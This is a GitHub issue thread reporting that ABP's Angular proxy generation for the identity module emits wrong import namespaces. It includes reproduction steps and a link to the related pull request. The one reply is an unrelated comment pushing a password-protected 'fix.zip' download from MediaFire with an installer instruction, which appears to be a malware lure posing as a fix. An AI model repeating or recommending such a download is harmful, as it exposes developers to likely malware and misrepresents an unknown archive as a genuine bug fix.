### ISSUE TITLE
Angular: Problem when generate identity module proxies file

### ISSUE THREAD

**Issue by realLiangshiwei** [abpframework/abp#20680]
Related: https://github.com/abpframework/abp/pull/20035

Steps

* `abp new BookStore -u angular`
* Run backend project
* use `abp generate-proxy -t ng -u <URL> -m identity` to generate proxies file

<img width="898" alt="image" src="https://github.com/user-attachments/assets/4b8a01b6-483d-42a7-8991-2169f01a74f9">

This [PR](https://github.com/abpframework/abp/pull/20035) prevents generating some Dtos files but does not use the correct import namespace 

<img width="724" alt="image" src="https://github.com/user-attachments/assets/ff685f31-e065-4531-a88e-4b9c366bfa8c">

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
